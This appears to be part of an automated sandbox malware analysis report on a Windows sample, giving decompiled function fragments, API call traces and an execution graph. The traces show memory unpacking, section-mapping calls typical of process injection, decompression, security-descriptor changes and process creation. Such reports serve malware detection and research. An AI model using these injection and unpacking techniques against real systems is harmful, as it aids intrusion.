                                                              Function 006D003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515memoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 0 6d003c-6d0047 1 6d004c-6d0263 call 6d0a3f call 6d0e0f call 6d0d90 VirtualAlloc 0->1 2 6d0049 0->2 17 6d028b-6d0292 1->17 18 6d0265-6d0289 call 6d0a69 1->18 2->1 20 6d02a1-6d02b0 17->20 22 6d02ce-6d03c2 VirtualProtect call 6d0cce call 6d0ce7 18->22 20->22 23 6d02b2-6d02cc 20->23 29 6d03d1-6d03e0 22->29 23->20 30 6d0439-6d04b8 VirtualFree 29->30 31 6d03e2-6d0437 call 6d0ce7 29->31 33 6d04be-6d04cd 30->33 34 6d05f4-6d05fe 30->34 31->29 36 6d04d3-6d04dd 33->36 37 6d077f-6d0789 34->37 38 6d0604-6d060d 34->38 36->34 40 6d04e3-6d0505 36->40 41 6d078b-6d07a3 37->41 42 6d07a6-6d07b0 37->42 38->37 43 6d0613-6d0637 38->43 51 6d0517-6d0520 40->51 52 6d0507-6d0515 40->52 41->42 44 6d086e-6d08be LoadLibraryA 42->44 45 6d07b6-6d07cb 42->45 46 6d063e-6d0648 43->46 50 6d08c7-6d08f9 44->50 48 6d07d2-6d07d5 45->48 46->37 49 6d064e-6d065a 46->49 53 6d0824-6d0833 48->53 54 6d07d7-6d07e0 48->54 49->37 55 6d0660-6d066a 49->55 56 6d08fb-6d0901 50->56 57 6d0902-6d091d 50->57 58 6d0526-6d0547 51->58 52->58 62 6d0839-6d083c 53->62 59 6d07e4-6d0822 54->59 60 6d07e2 54->60 61 6d067a-6d0689 55->61 56->57 63 6d054d-6d0550 58->63 59->48 60->53 64 6d068f-6d06b2 61->64 65 6d0750-6d077a 61->65 62->44 66 6d083e-6d0847 62->66 72 6d0556-6d056b 63->72 73 6d05e0-6d05ef 63->73 67 6d06ef-6d06fc 64->67 68 6d06b4-6d06ed 64->68 65->46 69 6d0849 66->69 70 6d084b-6d086c 66->70 74 6d06fe-6d0748 67->74 75 6d074b 67->75 68->67 69->44 70->62 76 6d056d 72->76 77 6d056f-6d057a 72->77 73->36 74->75 75->61 76->73 80 6d057c-6d0599 77->80 81 6d059b-6d05bb 77->81 84 6d05bd-6d05db 80->84 81->84 84->63
                                                              APIs
                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 006D024D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.384994661.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_6d0000_dfhwrav.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID: cess$kernel32.dll
                                                              • API String ID: 4275171209-1230238691
                                                              • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                              • Instruction ID: 5ebbe460fe37c58c253ed573dd18450252dbf76ec07c608bcbb3694c3860dc94
                                                              • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                              • Instruction Fuzzy Hash: 23525874E012299FDB64CF58C985BA8BBB1BF09304F1480DAE94DAB351DB30AA95DF14
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0040A22A Relevance: 7.6, APIs: 5, Instructions: 84COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 318 40a22a-40a243 320 40a245-40a248 318->320 321 40a25d-40a261 318->321 324 40a2ed-40a2ef 320->324 322 40a263-40a278 call 40b014 321->322 323 40a24d-40a24f 321->323 322->320 331 40a27a-40a281 322->331 326 40a251 323->326 327 40a252-40a259 call 40b5e0 323->327 326->327 327->321 332 40a2c5-40a2c8 331->332 333 40a283-40a290 call 40b5e0 332->333 334 40a2ca-40a2e9 332->334 339 40a292-40a295 call 40b014 333->339 340 40a2c3 333->340 338 40a2eb-40a2ec 334->338 338->324 342 40a29a-40a2a0 339->342 340->332 343 40a2f0-40a305 342->343 344 40a2a2-40a2af call 40b4db 342->344 343->338 348 40a2c0 344->348 349 40a2b1-40a2bd 344->349 348->340 349->348
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.384839901.0000000000409000.00000020.00000001.01000000.00000007.sdmp, Offset: 00409000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_409000_dfhwrav.jbxd
                                                              Similarity
                                                              • API ID: __calloc_crt
                                                              • String ID:
                                                              • API String ID: 3494438863-0
                                                              • Opcode ID: 53f0db518e11e19cf3d20b75c8e5157a4bfced06fe33a4e46221324b2e3a85d0
                                                              • Instruction ID: 7ff23b28151b566c8cbfd56bb0cd94605b4a1bb2763dc4f056cfeb7ae197ddbf
                                                              • Opcode Fuzzy Hash: 53f0db518e11e19cf3d20b75c8e5157a4bfced06fe33a4e46221324b2e3a85d0
                                                              • Instruction Fuzzy Hash: C521F6B28083406AD7216B317C05B6737C8EB81379F2505BFE851763D2EB7E9891865E
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 006D0E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 364 6d0e0f-6d0e24 SetErrorMode * 2 365 6d0e2b-6d0e2c 364->365 366 6d0e26 364->366 366->365
                                                              APIs
                                                              • SetErrorMode.KERNELBASE(00000400,?,?,006D0223,?,?), ref: 006D0E19
                                                              • SetErrorMode.KERNELBASE(00000000,?,?,006D0223,?,?), ref: 006D0E1E
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.384994661.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_6d0000_dfhwrav.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorMode
                                                              • String ID:
                                                              • API String ID: 2340568224-0
                                                              • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                              • Instruction ID: d737391412cb78383b34bd059ac362a3996041c191b4104b2eff9d787dbb4a53
                                                              • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                              • Instruction Fuzzy Hash: C7D0123154512877D7102A94DC09BCD7B1CDF05B62F008411FB0DD9180C770994046E5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0040189D Relevance: 1.3, APIs: 1, Instructions: 55sleepCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 367 40189d-4018e0 call 4011bb Sleep call 4013f5 377 4018e2-4018ea call 4014cf 367->377 378 4018ef-40192c call 4011bb 367->378 377->378
                                                              C-Code - Quality: 66%
                                                              			E0040189D(signed int __edx, void* __edi, void* __esi, void* __fp0) {
				void* _t11;
				intOrPtr* _t14;
				void* _t15;
				void* _t20;
				signed char _t21;

				_t18 = __edi;
				_t17 = __edx ^  *[gs:0x18c3b8];
				_t21 = __edx ^  *[gs:0x18c3b8];
				__eax = __eax | 0xf3f98595;
				__eflags = 0x18c3;
				_t15 = 0x65;
				E004011BB(0x18c3, _t15, _t17, __edi, __esi, _t21, __fp0);
				_t14 =  *((intOrPtr*)(_t20 + 8));
				Sleep(0x1388);
				_t11 = E004013F5(_t17, _t18, __esi, _t21, _t14,  *((intOrPtr*)(_t20 + 0xc)),  *((intOrPtr*)(_t20 + 0x10)), _t20 - 4); // executed
				_t22 = _t11;
				if(_t11 != 0) {
					E004014CF(_t17, _t22, __fp0, _t14, _t11,  *((intOrPtr*)(_t20 - 4)),  *((intOrPtr*)(_t20 + 0x14))); // executed
				}
				 *_t14(0xffffffff, 0);
				_push(0x18c3);
			}








                                                              0x0040189d
                                                              0x0040189d
                                                              0x0040189d
                                                              0x004018ad
                                                              0x004018ad
                                                              0x004018b6
                                                              0x004018be
                                                              0x004018c3
                                                              0x004018cb
                                                              0x004018d9
                                                              0x004018de
                                                              0x004018e0
                                                              0x004018ea
                                                              0x004018ea
                                                              0x004018f3
                                                              0x004018fc

                                                              APIs
                                                              • Sleep.KERNELBASE(00001388), ref: 004018CB
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.384823661.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_dfhwrav.jbxd
                                                              Similarity
                                                              • API ID: Sleep
                                                              • String ID:
                                                              • API String ID: 3472027048-0
                                                              • Opcode ID: 8b77036b1a27a9c7dfc0189ead4c1f30c43aa5a46c5e9ddab95927bc0a212abd
                                                              • Instruction ID: a02e35ba6da00efe994e29ce0eaeefbb09db0d2e4018ecf4a20588ff4ad8f681
                                                              • Opcode Fuzzy Hash: 8b77036b1a27a9c7dfc0189ead4c1f30c43aa5a46c5e9ddab95927bc0a212abd
                                                              • Instruction Fuzzy Hash: 6201B977608105EBEB016A948C41EB93765AF44711F24C537BA03781F1D67D8713A76F
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00401890 Relevance: 1.3, APIs: 1, Instructions: 53sleepCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 389 401890-4018e0 call 4011bb Sleep call 4013f5 401 4018e2-4018ea call 4014cf 389->401 402 4018ef-40192c call 4011bb 389->402 401->402
                                                              C-Code - Quality: 57%
                                                              			E00401890(void* __ebx, void* __edi, void* __esi, void* __fp0, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				void* _t11;
				intOrPtr* _t15;
				void* _t16;
				void* _t17;
				void* _t20;

				_t18 = __edi;
				_push(__edi);
				__eax = __eax | 0xf3f98595;
				__eflags = 0x18c3;
				_t16 = 0x65;
				E004011BB(0x18c3, _t16, _t17, __edi, __esi, _t20, __fp0);
				_t15 = _a4;
				Sleep(0x1388);
				_t11 = E004013F5(_t17, _t18, __esi, _t20, _t15, _a8, _a12,  &_v8); // executed
				_t21 = _t11;
				if(_t11 != 0) {
					E004014CF(_t17, _t21, __fp0, _t15, _t11, _v8, _a16); // executed
				}
				 *_t15(0xffffffff, 0);
				_push(0x18c3);
			}









                                                              0x00401890
                                                              0x00401898
                                                              0x004018ad
                                                              0x004018ad
                                                              0x004018b6
                                                              0x004018be
                                                              0x004018c3
                                                              0x004018cb
                                                              0x004018d9
                                                              0x004018de
                                                              0x004018e0
                                                              0x004018ea
                                                              0x004018ea
                                                              0x004018f3
                                                              0x004018fc

                                                              APIs
                                                              • Sleep.KERNELBASE(00001388), ref: 004018CB
                                                                • Part of subcall function 004014CF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                                • Part of subcall function 004014CF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                                • Part of subcall function 004014CF: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.384823661.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_dfhwrav.jbxd
                                                              Similarity
                                                              • API ID: Section$CreateDuplicateObjectSleepView
                                                              • String ID:
                                                              • API String ID: 1885482327-0
                                                              • Opcode ID: 04d77c005a321a04c0d65ccc9281052a4a3ded78dde72ec47b1ef39188f4cdac
                                                              • Instruction ID: 8f39270ed9ea08bd5d3f38822785b1c482e0596b14cfc6610146d31112912ead
                                                              • Opcode Fuzzy Hash: 04d77c005a321a04c0d65ccc9281052a4a3ded78dde72ec47b1ef39188f4cdac
                                                              • Instruction Fuzzy Hash: 1001D876608104EBE7007A948C81EAA3369AF04710F208537BA03781F1C53D9713A76F
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 006FC6AD Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 413 6fc6ad-6fc6e7 call 6fc9c0 416 6fc6e9-6fc71c VirtualAlloc call 6fc73a 413->416 417 6fc735 413->417 419 6fc721-6fc733 416->419 417->417 419->417
                                                              APIs
                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 006FC6FE
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.385082783.00000000006F8000.00000040.00000020.00020000.00000000.sdmp, Offset: 006F8000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_6f8000_dfhwrav.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                              • Instruction ID: d0b687bf4b4ed1f18fc7656e5c23c8fbbbe52d39d3520d4c9dfaca93a096de4c
                                                              • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                              • Instruction Fuzzy Hash: 95113C79A00208EFDB01DF98CA85E98BBF5AF08350F058094FA489B362D371EA50DF80
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 004018BA Relevance: 1.3, APIs: 1, Instructions: 43sleepCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 420 4018ba-4018e0 call 4011bb Sleep call 4013f5 428 4018e2-4018ea call 4014cf 420->428 429 4018ef-40192c call 4011bb 420->429 428->429
                                                              C-Code - Quality: 64%
                                                              			E004018BA(void* __edi, void* __esi, void* __eflags, void* __fp0) {
				void* _t8;
				void* _t11;
				intOrPtr* _t14;
				void* _t15;
				void* _t16;
				void* _t19;

				_t20 = __eflags;
				_t17 = __edi;
				_t15 = 0x65;
				E004011BB(_t8, _t15, _t16, __edi, __esi, __eflags, __fp0);
				_t14 =  *((intOrPtr*)(_t19 + 8));
				Sleep(0x1388);
				_t11 = E004013F5(_t16, _t17, __esi, _t20, _t14,  *((intOrPtr*)(_t19 + 0xc)),  *((intOrPtr*)(_t19 + 0x10)), _t19 - 4); // executed
				_t21 = _t11;
				if(_t11 != 0) {
					E004014CF(_t16, _t21, __fp0, _t14, _t11,  *((intOrPtr*)(_t19 - 4)),  *((intOrPtr*)(_t19 + 0x14))); // executed
				}
				 *_t14(0xffffffff, 0);
				_push(0x18c3);
			}









                                                              0x004018ba
                                                              0x004018ba
                                                              0x004018b6
                                                              0x004018be
                                                              0x004018c3
                                                              0x004018cb
                                                              0x004018d9
                                                              0x004018de
                                                              0x004018e0
                                                              0x004018ea
                                                              0x004018ea
                                                              0x004018f3
                                                              0x004018fc

                                                              APIs
                                                              • Sleep.KERNELBASE(00001388), ref: 004018CB
                                                                • Part of subcall function 004014CF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                                • Part of subcall function 004014CF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                                • Part of subcall function 004014CF: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.384823661.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_dfhwrav.jbxd
                                                              Similarity
                                                              • API ID: Section$CreateDuplicateObjectSleepView
                                                              • String ID:
                                                              • API String ID: 1885482327-0
                                                              • Opcode ID: 2150068fafe268fe9e7df539654189d3fc6e8b654a1e8f04fb5b48b64cd69d78
                                                              • Instruction ID: b534f1cd2e4676c17bf77ce83b64d7a83011e734f56cb89338415bb8e59cf26b
                                                              • Opcode Fuzzy Hash: 2150068fafe268fe9e7df539654189d3fc6e8b654a1e8f04fb5b48b64cd69d78
                                                              • Instruction Fuzzy Hash: EDF06876208105EBDB016F949C82EAE3365AF48711F248537FB03791F1C67D9623A76B
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Execution Graph

                                                              Execution Coverage:16.4%
                                                              Dynamic/Decrypted Code Coverage:2.8%
                                                              Signature Coverage:32.7%
                                                              Total number of Nodes:425
                                                              Total number of Limit Nodes:39
                                                              execution_graph 20978 410820 20979 41084b 20978->20979 20980 4108bc RaiseException 20979->20980 20985 4108e4 20979->20985 20997 410951 20980->20997 20981 410984 20986 410988 GetLastError 20981->20986 20989 4109d3 20981->20989 20982 410979 LoadLibraryA 20982->20981 20983 410a83 20984 410a87 GetLastError 20983->20984 20983->20997 20990 410a98 20984->20990 20985->20981 20985->20982 20988 410a1a 20985->20988 20985->20997 20991 410999 20986->20991 20987 410a77 GetProcAddress 20987->20983 20988->20983 20988->20987 20988->20997 20994 4109e1 20989->20994 20995 410a14 FreeLibrary 20989->20995 20992 410aaa RaiseException 20990->20992 20990->20997 20991->20989 20993 4109ab RaiseException 20991->20993 20992->20997 20993->20997 20994->20988 20996 4109e7 LocalAlloc 20994->20996 20995->20988 20996->20988 20998 4109f7 20996->20998 20998->20988 21458 40581c 25 API calls 21464 883f6c CryptDestroyHash 21113 8991af 88 API calls 21460 40e907 14 API calls 21114 405968 21115 405980 21114->21115 21116 405bc8 21114->21116 21126 405992 21115->21126 21128 405a1d Sleep 21115->21128 21117 405ce0 21116->21117 21118 405b8c 21116->21118 21119 405714 VirtualAlloc 21117->21119 21120 405ce9 21117->21120 21127 405ba6 Sleep 21118->21127 21129 405be6 21118->21129 21122 40574f 21119->21122 21123 40573f 21119->21123 21121 4059a1 21138 4056c8 21123->21138 21125 405a80 21137 405a8c 21125->21137 21143 40564c 21125->21143 21126->21121 21126->21125 21132 405a61 Sleep 21126->21132 21127->21129 21130 405bbc Sleep 21127->21130 21128->21126 21131 405a33 Sleep 21128->21131 21133 40564c VirtualAlloc 21129->21133 21134 405c04 21129->21134 21130->21118 21131->21115 21132->21125 21136 405a77 Sleep 21132->21136 21133->21134 21136->21126 21139 405710 21138->21139 21140 4056d1 21138->21140 21139->21122 21140->21139 21141 4056dc Sleep 21140->21141 21141->21139 21142 4056f6 Sleep 21141->21142 21142->21140 21147 4055e0 21143->21147 21145 405655 VirtualAlloc 21146 40566c 21145->21146 21146->21137 21148 405580 21147->21148 21148->21145 21457 89b4c1 SysFreeString 21459 6c3964 VariantClear VariantClear VariantInit VariantCopy VariantCopy 20999 6c2a58 21004 40f0ec 20999->21004 21001 6c2a78 21009 409394 22 API calls 21001->21009 21005 40f0f4 21004->21005 21005->21005 21006 40f141 21005->21006 21010 40c54c 21005->21010 21006->21001 21008 40f130 LoadStringW 21008->21006 21011 40c579 21010->21011 21012 40c55a 21010->21012 21011->21008 21012->21011 21015 40c504 21012->21015 21016 40c514 GetModuleFileNameW 21015->21016 21017 40c530 21015->21017 21019 40d778 GetModuleFileNameW 21016->21019 21017->21008 21020 40d7c6 21019->21020 21025 40d654 21020->21025 21022 40d7f2 21023 40d804 LoadLibraryExW 21022->21023 21024 40d80c 21022->21024 21023->21024 21024->21017 21028 40d675 21025->21028 21026 40d6fd 21026->21022 21028->21026 21043 40d390 21028->21043 21029 40d6ea 21030 40d6f0 21029->21030 21031 40d6ff GetUserDefaultUILanguage 21029->21031 21032 40d4bc 2 API calls 21030->21032 21047 40cd40 EnterCriticalSection 21031->21047 21032->21026 21034 40d70c 21067 40d4bc 21034->21067 21036 40d719 21037 40d741 21036->21037 21038 40d727 GetSystemDefaultUILanguage 21036->21038 21037->21026 21071 40d588 21037->21071 21039 40cd40 17 API calls 21038->21039 21041 40d734 21039->21041 21042 40d4bc 2 API calls 21041->21042 21042->21037 21044 40d3b2 21043->21044 21046 40d3bc 21043->21046 21079 40d074 21044->21079 21046->21029 21048 40cd8c LeaveCriticalSection 21047->21048 21049 40cd6c 21047->21049 21101 409c98 21048->21101 21051 40cd7d LeaveCriticalSection 21049->21051 21058 40ce2e 21051->21058 21052 40cd9d IsValidLocale 21053 40cdfb EnterCriticalSection 21052->21053 21054 40cdac 21052->21054 21055 40ce13 21053->21055 21056 40cdc0 21054->21056 21057 40cdb5 21054->21057 21062 40ce24 LeaveCriticalSection 21055->21062 21104 40ca28 IsValidLocale GetLocaleInfoW GetLocaleInfoW 21056->21104 21103 40cc24 6 API calls 21057->21103 21058->21034 21061 40cdc9 GetSystemDefaultUILanguage 21061->21053 21063 40cdd3 21061->21063 21062->21058 21064 40cde4 GetSystemDefaultUILanguage 21063->21064 21105 40ca28 IsValidLocale GetLocaleInfoW GetLocaleInfoW 21064->21105 21066 40cdbe 21066->21053 21069 40d4da 21067->21069 21068 40d555 21068->21036 21069->21068 21106 40d450 21069->21106 21111 409d7c 21071->21111 21074 40d5d8 21075 40d450 2 API calls 21074->21075 21076 40d5ec 21075->21076 21077 40d61a 21076->21077 21078 40d450 2 API calls 21076->21078 21077->21026 21078->21077 21080 40d08b 21079->21080 21081 40d09f GetModuleFileNameW 21080->21081 21082 40d0b4 21080->21082 21081->21082 21083 40d283 21082->21083 21084 40d0dc RegOpenKeyExW 21082->21084 21083->21046 21085 40d103 RegOpenKeyExW 21084->21085 21086 40d19d 21084->21086 21085->21086 21087 40d121 RegOpenKeyExW 21085->21087 21100 40ce84 7 API calls 21086->21100 21087->21086 21089 40d13f RegOpenKeyExW 21087->21089 21089->21086 21091 40d15d RegOpenKeyExW 21089->21091 21090 40d1bb RegQueryValueExW 21092 40d1d9 21090->21092 21093 40d20c RegQueryValueExW 21090->21093 21091->21086 21094 40d17b RegOpenKeyExW 21091->21094 21097 40d1e1 RegQueryValueExW 21092->21097 21095 40d228 21093->21095 21098 40d20a 21093->21098 21094->21083 21094->21086 21099 40d230 RegQueryValueExW 21095->21099 21096 40d272 RegCloseKey 21096->21046 21097->21098 21098->21096 21099->21098 21100->21090 21102 409c9e 21101->21102 21102->21052 21103->21066 21104->21061 21105->21066 21107 40d465 21106->21107 21108 40d482 FindFirstFileW 21107->21108 21109 40d492 FindClose 21108->21109 21110 40d498 21108->21110 21109->21110 21110->21069 21112 409d80 GetUserDefaultUILanguage GetLocaleInfoW 21111->21112 21112->21074 21462 87a511 CryptReleaseContext 21456 40e858 41 API calls 21461 8799ff 42 API calls 21149 25ca026 21150 25ca035 21149->21150 21153 25ca7c6 21150->21153 21159 25ca7e1 21153->21159 21154 25ca7ea CreateToolhelp32Snapshot 21155 25ca806 Module32First 21154->21155 21154->21159 21156 25ca815 21155->21156 21158 25ca03e 21155->21158 21160 25ca485 21156->21160 21159->21154 21159->21155 21161 25ca4b0 21160->21161 21162 25ca4f9 21161->21162 21163 25ca4c1 VirtualAlloc 21161->21163 21162->21162 21163->21162 21164 8a4510 21171 4107d4 GetModuleHandleW 21164->21171 21166 8a4520 21173 897244 21166->21173 21168 8a4525 21207 4099c8 21168->21207 21172 41080f 21171->21172 21172->21166 21174 89724c 21173->21174 21220 85e760 21174->21220 21176 897543 21257 873660 GetTempPathW 21176->21257 21178 89754e 21259 4071f0 21178->21259 21181 898a09 21182 4235f0 7 API calls 21181->21182 21185 898def 21181->21185 21186 898a2f 21182->21186 21183 89797a 21265 885b34 21183->21265 21184 885b34 56 API calls 21188 899972 21184->21188 21185->21168 21185->21184 21186->21185 21187 87c50c 6 API calls 21186->21187 21192 898c67 21187->21192 21190 89aa3f 21188->21190 21276 4235f0 21188->21276 21341 407eac 21190->21341 21193 87e220 14 API calls 21192->21193 21193->21185 21194 89b0f0 21195 407eac 10 API calls 21194->21195 21198 89b2fd 21195->21198 21196 899a4f 21204 89a09e 21196->21204 21289 880028 21196->21289 21198->21168 21199 899ee1 21295 87c50c 21199->21295 21202 89a05a 21308 87e220 21202->21308 21323 873bf4 21204->21323 21205 89a782 21334 87518c 21205->21334 21208 4099e4 21207->21208 21209 4099f5 21207->21209 21454 409930 GetStdHandle WriteFile GetStdHandle WriteFile 21208->21454 21210 4099fe GetCurrentThreadId 21209->21210 21215 409a0b 21209->21215 21210->21215 21212 4099ee 21212->21209 21214 407eac 10 API calls 21214->21215 21215->21214 21216 406f34 19 API calls 21215->21216 21217 409a9b FreeLibrary 21215->21217 21218 409ac3 ExitProcess 21215->21218 21450 409628 21215->21450 21216->21215 21217->21215 21221 85e768 21220->21221 21222 85ee95 21221->21222 21223 85f152 GetModuleHandleW 21222->21223 21224 85f160 21223->21224 21225 85f251 21224->21225 21227 86eb5b 21224->21227 21226 85f5bb GetProcAddress 21225->21226 21233 85f5d5 21226->21233 21345 409ce0 21227->21345 21229 86f141 21230 409ce0 SysFreeString 21229->21230 21231 86f187 21230->21231 21232 409ce0 SysFreeString 21231->21232 21235 86f272 21232->21235 21234 85f908 GetProcAddress 21233->21234 21238 85f91c 21234->21238 21236 409ce0 SysFreeString 21235->21236 21237 86f358 21236->21237 21237->21176 21239 85ffaa GetProcAddress 21238->21239 21240 85ffd3 21239->21240 21241 8602ac GetProcAddress 21240->21241 21242 8602ce 21241->21242 21243 860462 GetProcAddress 21242->21243 21244 860484 21243->21244 21245 860684 GetProcAddress 21244->21245 21247 8606a7 21245->21247 21246 861286 GetProcAddress 21248 8612a4 21246->21248 21247->21246 21249 8616d0 GetProcAddress 21248->21249 21250 8616ea 21249->21250 21251 861ac1 GetProcAddress 21250->21251 21252 861ada 21251->21252 21253 861dba GetProcAddress 21252->21253 21254 861ddc 21253->21254 21255 8620ba GetProcAddress 21254->21255 21256 8620e1 21255->21256 21256->21176 21258 8736c5 21257->21258 21258->21178 21260 407204 21259->21260 21261 407226 GetCommandLineW 21260->21261 21262 407208 GetModuleFileNameW 21260->21262 21264 40722d 21261->21264 21263 407224 21262->21263 21263->21264 21264->21183 21266 885b3d 21265->21266 21270 888883 21266->21270 21348 878884 21266->21348 21268 888867 21370 881940 21268->21370 21270->21181 21271 888875 21271->21270 21272 888dce RtlDecompressBuffer 21271->21272 21275 888de6 21272->21275 21273 407eac 10 API calls 21274 88961a 21273->21274 21274->21181 21275->21273 21389 40a928 21276->21389 21278 4235fe GetFileAttributesW 21279 42365a GetLastError 21278->21279 21280 42360b 21278->21280 21281 423614 21279->21281 21282 423666 21279->21282 21280->21281 21284 423620 CreateFileW 21280->21284 21281->21196 21282->21281 21283 423670 21282->21283 21391 4235b0 FindFirstFileW FindClose 21283->21391 21286 423644 GetLastError 21284->21286 21287 42363a CloseHandle 21284->21287 21286->21281 21287->21281 21288 423677 21288->21281 21292 880030 21289->21292 21290 880fae 21290->21199 21292->21290 21392 407250 QueryPerformanceCounter 21292->21392 21293 88073b 21294 878884 48 API calls 21293->21294 21294->21290 21296 87c514 21295->21296 21296->21296 21297 87c51b InitializeSecurityDescriptor 21296->21297 21298 87c547 21297->21298 21307 87c9b6 21297->21307 21299 87c629 InitializeAcl 21298->21299 21300 87c645 21299->21300 21299->21307 21301 87c74b CreateWellKnownSid 21300->21301 21303 87c766 21301->21303 21302 87c903 CreateWellKnownSid 21304 87c91d AddAccessAllowedAce 21302->21304 21302->21307 21303->21302 21305 87c93a 21304->21305 21304->21307 21306 87c99c SetSecurityDescriptorDacl 21305->21306 21306->21307 21307->21202 21309 87e229 21308->21309 21309->21309 21395 409d9c 21309->21395 21311 87e251 21312 4235f0 7 API calls 21311->21312 21321 87e278 21312->21321 21313 87e9c4 21314 87e9e0 CreateFileW 21313->21314 21315 87ea8c 21314->21315 21318 87e9f4 21314->21318 21316 409ce0 SysFreeString 21315->21316 21317 87eac6 21316->21317 21317->21204 21320 87ea61 WriteFile CloseHandle 21318->21320 21319 87e9bd DeleteFileW 21319->21313 21320->21315 21321->21313 21322 87e673 21321->21322 21322->21319 21322->21321 21326 873bfc 21323->21326 21324 873f8b GetWindowsDirectoryW 21401 409e50 21324->21401 21326->21324 21327 873fb2 21331 874170 21327->21331 21407 871424 21327->21407 21329 87415d 21419 40a730 SysAllocStringLen SysFreeString SysFreeString SysFreeString 21329->21419 21332 409ce0 SysFreeString 21331->21332 21333 87427f 21332->21333 21333->21205 21335 409d9c 2 API calls 21334->21335 21336 8751de 21335->21336 21337 875c3f CreateProcessW 21336->21337 21338 875c4c 21337->21338 21339 409ce0 SysFreeString 21338->21339 21340 875ed6 21339->21340 21340->21190 21342 407eb0 21341->21342 21343 407eb7 21341->21343 21430 405cec 21342->21430 21343->21194 21346 409cf4 21345->21346 21347 409ce6 SysFreeString 21345->21347 21346->21229 21347->21346 21350 87888c 21348->21350 21349 878aec CryptAcquireContextA 21351 878b09 21349->21351 21354 87aec5 21349->21354 21350->21349 21352 878b83 CryptCreateHash 21351->21352 21356 878ba2 21352->21356 21362 87a5d5 21352->21362 21353 87ac44 CryptReleaseContext 21357 87ac5b 21353->21357 21354->21268 21355 878ed5 CryptHashData 21358 878ef1 21355->21358 21363 879a67 21355->21363 21356->21355 21357->21268 21361 879362 CryptGetHashParam 21358->21361 21359 87a3c9 CryptDestroyHash 21360 87a3e1 21359->21360 21360->21268 21361->21363 21364 87937e 21361->21364 21362->21353 21363->21359 21387 40c12c 41 API calls 21364->21387 